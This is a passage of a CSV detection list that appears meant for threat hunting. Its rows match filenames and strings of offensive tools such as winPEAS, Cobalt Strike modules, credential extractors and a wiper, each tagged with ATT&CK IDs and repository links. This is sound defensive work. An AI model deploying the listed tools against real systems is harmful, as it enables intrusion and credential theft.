+"*winPEAS.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*winPEASany.exe*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*winPEASany.exe*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" +"*winPEASany_ofs.exe*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*winPEASany_ofs.exe*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" +"*winPEAS-Obfuscated*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" +"*winPEASps1*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" +"*winPEASx64.exe*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*winPEASx64.exe*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" +"*winPEASx64_ofs.exe*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" +"*winPEASx86.exe*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*winPEASx86.exe*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" +"*winPEASx86_ofs.exe*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*winPEASx86_ofs.exe*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" +"*Win-PS2EXE.exe*","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","9","838","155","2023-09-26T15:03:14Z","2019-11-08T09:25:02Z" +"*WinPwn -*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*WinPwn.exe*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*WinPwn.ps1*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*WinPwnage*","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1203 - T1059 - T1547.001","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","2498","388","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z" +"*winpwnage.functions*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*winreconstreamline.bat*","offensive_tool_keyword","Windows-Privilege-Escalation","Windows Privilege Escalation Techniques and Scripts","T1055 - T1548 - T1078","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/frizb/Windows-Privilege-Escalation","1","1","N/A","N/A","8","710","185","2020-03-25T22:35:02Z","2017-05-12T13:09:50Z" +"*winregistry.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*WinRing0*WinRing0x64.sys*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*winrm_command_shell.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*winrm_script_exec.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*winrmdll *","offensive_tool_keyword","cobaltstrike","C++ WinRM API via Reflective DLL","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mez-0/winrmdll","1","0","N/A","10","10","138","27","2021-09-11T13:44:16Z","2021-09-11T13:40:22Z" +"*winrmdll.*","offensive_tool_keyword","cobaltstrike","C++ WinRM API via Reflective DLL","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mez-0/winrmdll","1","1","N/A","10","10","138","27","2021-09-11T13:44:16Z","2021-09-11T13:40:22Z" +"*winrs -r:*whoami*","greyware_tool_keyword","winrs","WinRS for Lateral Movement","T1021.006 - T1028","TA0008 ","N/A","N/A","Lateral Movement","N/A","1","0","N/A","6","10","N/A","N/A","N/A","N/A" +"*WinSCPPasswdExtractor*","offensive_tool_keyword","WinSCPPasswdExtractor","Extract WinSCP Credentials from any Windows System or winscp config file","T1003.001 - T1083 - T1145","TA0003 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/NeffIsBack/WinSCPPasswdExtractor","1","1","N/A","N/A","1","8","0","2023-07-01T17:27:32Z","2022-12-20T11:55:55Z" +"*WinShellcode.git*","offensive_tool_keyword","WinShellcode","It's a C code project created in Visual Studio that helps you generate shellcode from your C code.","T1059.001 - T1059.003 - T1059.005 - T1059.007 - T1059.004 - T1059.006 - T1218 - T1027.001 - T1564.003 - T1027","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/DallasFR/WinShellcode","1","1","N/A","N/A",,"N/A",,, +"*WinShellcode-main*","offensive_tool_keyword","WinShellcode","It's a C code project created in Visual Studio that helps you generate shellcode from your C code.","T1059.001 - T1059.003 - T1059.005 - T1059.007 - T1059.004 - T1059.006 - T1218 - T1027.001 - T1564.003 - T1027","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/DallasFR/WinShellcode","1","1","N/A","N/A",,"N/A",,, +"*Winsocky-main*","offensive_tool_keyword","cobaltstrike","Winsocket for Cobalt Strike.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/WKL-Sec/Winsocky","1","1","N/A","10","10","80","13","2023-07-06T11:47:18Z","2023-06-22T07:00:22Z" +"*WINspect.ps1*","offensive_tool_keyword","WINspect","WINspect is part of a larger project for auditing different areas of Windows environments.It focuses on enumerating different parts of a Windows machine to identify security weaknesses and point to components that need further hardening.can be used by attacker ","T1018 - T1082 - T1057 - T1547.001 - T1053","TA0003 - TA0006 - TA0008 - TA0010","N/A","N/A","Information Gathering","https://github.com/A-mIn3/WINspect","1","1","N/A","N/A","6","568","116","2019-01-09T12:56:57Z","2017-08-10T15:10:10Z" +"*win-x64-DynamicKernelWinExecCalc*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","1","private github repo","10",,"N/A",,, +"*Wiper POC tool that wipes a given directory*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" +"*WiperPoc.exe*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" +"*WiperPoc\WiperPoc*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" +"*wireghoul/htshells*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" +"*wireless/captures.py*","offensive_tool_keyword","wifibroot","A Wireless (WPA/WPA2) Pentest/Cracking tool. Captures & Crack 4-way handshake and PMKID key. Also. supports a deauthentication/jammer mode for stress testing","T1018 - T1040 - T1095 - T1113 - T1210 - T1437 - T1499 - T1557 - T1562 - T1573","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Network Exploitation tools","https://github.com/hash3liZer/WiFiBroot","1","1","N/A","N/A","9","866","180","2021-01-15T09:07:36Z","2018-07-30T10:57:22Z" +"*wireless/cracker.py*","offensive_tool_keyword","wifibroot","A Wireless (WPA/WPA2) Pentest/Cracking tool. Captures & Crack 4-way handshake and PMKID key. Also. supports a deauthentication/jammer mode for stress testing","T1018 - T1040 - T1095 - T1113 - T1210 - T1437 - T1499 - T1557 - T1562 - T1573","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Network Exploitation tools","https://github.com/hash3liZer/WiFiBroot","1","1","N/A","N/A","9","866","180","2021-01-15T09:07:36Z","2018-07-30T10:57:22Z" +"*wireless/pmkid.py*","offensive_tool_keyword","wifibroot","A Wireless (WPA/WPA2) Pentest/Cracking tool. Captures & Crack 4-way handshake and PMKID key. Also. supports a deauthentication/jammer mode for stress testing","T1018 - T1040 - T1095 - T1113 - T1210 - T1437 - T1499 - T1557 - T1562 - T1573","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Network Exploitation tools","https://github.com/hash3liZer/WiFiBroot","1","1","N/A","N/A","9","866","180","2021-01-15T09:07:36Z","2018-07-30T10:57:22Z" +"*wireless/sniper.py*","offensive_tool_keyword","wifibroot","A Wireless (WPA/WPA2) Pentest/Cracking tool. Captures & Crack 4-way handshake and PMKID key. Also. supports a deauthentication/jammer mode for stress testing","T1018 - T1040 - T1095 - T1113 - T1210 - T1437 - T1499 - T1557 - T1562 - T1573","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Network Exploitation tools","https://github.com/hash3liZer/WiFiBroot","1","1","N/A","N/A","9","866","180","2021-01-15T09:07:36Z","2018-07-30T10:57:22Z" +"*wireless_attack_tools.py*","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","39278","4350","2023-09-13T19:08:33Z","2020-04-11T09:21:31Z" +"*wirelesskeyview.exe*","offensive_tool_keyword","WirelessKeyView","WirelessKeyView recovers all wireless network security keys/passwords (WEP/WPA) stored in your computer ","T1003 - T1016 - T1021 - T1056 - T1110 - T1212 - T1552 - T1557","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/wireless_key.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*wirelesskeyview.zip*","offensive_tool_keyword","WirelessKeyView","WirelessKeyView recovers all wireless network security keys/passwords (WEP/WPA) stored in your computer ","T1003 - T1016 - T1021 - T1056 - T1110 - T1212 - T1552 - T1557","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/wireless_key.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*WirelessKeyView_x64.exe*","offensive_tool_keyword","WirelessKeyView","WirelessKeyView recovers all wireless network security keys/passwords (WEP/WPA) stored in your computer ","T1003 - T1016 - T1021 - T1056 - T1110 - T1212 - T1552 - T1557","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/wireless_key.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*wirelesskeyview-no-command-line.zip*","offensive_tool_keyword","WirelessKeyView","WirelessKeyView recovers all wireless network security keys/passwords (WEP/WPA) stored in your computer ","T1003 - T1016 - T1021 - T1056 - T1110 - T1212 - T1552 - T1557","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/wireless_key.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*wirelesskeyview-x64.zip*","offensive_tool_keyword","WirelessKeyView","WirelessKeyView recovers all wireless network security keys/passwords (WEP/WPA) stored in your computer ","T1003 - T1016 - T1021 - T1056 - T1110 - T1212 - T1552 - T1557","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/wireless_key.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Wireshark*","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*wireshark*.deb*","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*Wireshark*.dmg*","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*wireshark-*.tar.xz*","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*wireshark-common*","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*wireshark-dev*","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*wireshark-gtk*","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*WiresharkPortable64*","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*wireshark-qt*","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*Wireshark-win*.exe*","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*wiresocks-main*","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","1","N/A","9","3","250","24","2022-09-29T07:41:16Z","2022-03-23T12:27:07Z" +"*wiresocks-redsocks*","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","1","N/A","9","3","250","24","2022-09-29T07:41:16Z","2022-03-23T12:27:07Z" +"*Witness.py*","offensive_tool_keyword","EyeWitness","EyeWitness is designed to take screenshots of websites provide some server header info. and identify default credentials if known.EyeWitness is designed to run on Kali Linux. It will auto detect the file you give it with the -f flag as either being a text file with URLs on each new line. nmap xml output. or nessus xml output. The --timeout flag is completely optional. and lets you provide the max time to wait when trying to render and screenshot a web page.","T1564 - T1518 - T1210 - T1514 - T1552","TA0002 - TA0007","N/A","N/A","Information Gathering","https://github.com/FortyNorthSecurity/EyeWitness","1","1","N/A","N/A","10","4415","812","2023-10-04T20:05:31Z","2014-02-26T16:23:25Z" +"*WitnessMe*","offensive_tool_keyword","WitnessMe","WitnessMe is primarily a Web Inventory tool inspired by Eyewitness. its also written to be extensible allowing you to create custom functionality that can take advantage of the headless browser it drives in the back-end.","T1210.001 - T1593.001 - T1593.002","TA0010 - ","N/A","N/A","Information Gathering","https://github.com/byt3bl33d3r/WitnessMe","1","1","N/A","N/A","7","689","109","2022-12-08T11:04:13Z","2019-07-06T05:25:10Z" +"*WkIKjtCbQzcqQd04ZsE4sFefvpjryhU5w9iVFxGz1oU*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*WKL-Sec/dcomhijack*","offensive_tool_keyword","dcomhijack","Lateral Movement Using DCOM and DLL Hijacking","T1021 - T1021.003 - T1574 - T1574.007 - T1574.002","TA0008 - TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/WKL-Sec/dcomhijack","1","1","N/A","10","3","229","23","2023-06-18T20:34:03Z","2023-06-17T20:23:24Z" +"*WKL-Sec/HiddenDesktop*","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","10","10","926","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z" +"*WKL-Sec/Winsocky*","offensive_tool_keyword","cobaltstrike","Winsocket for Cobalt Strike.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/WKL-Sec/Winsocky","1","1","N/A","10","10","80","13","2023-07-06T11:47:18Z","2023-06-22T07:00:22Z" +"*wkssvc_##*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - 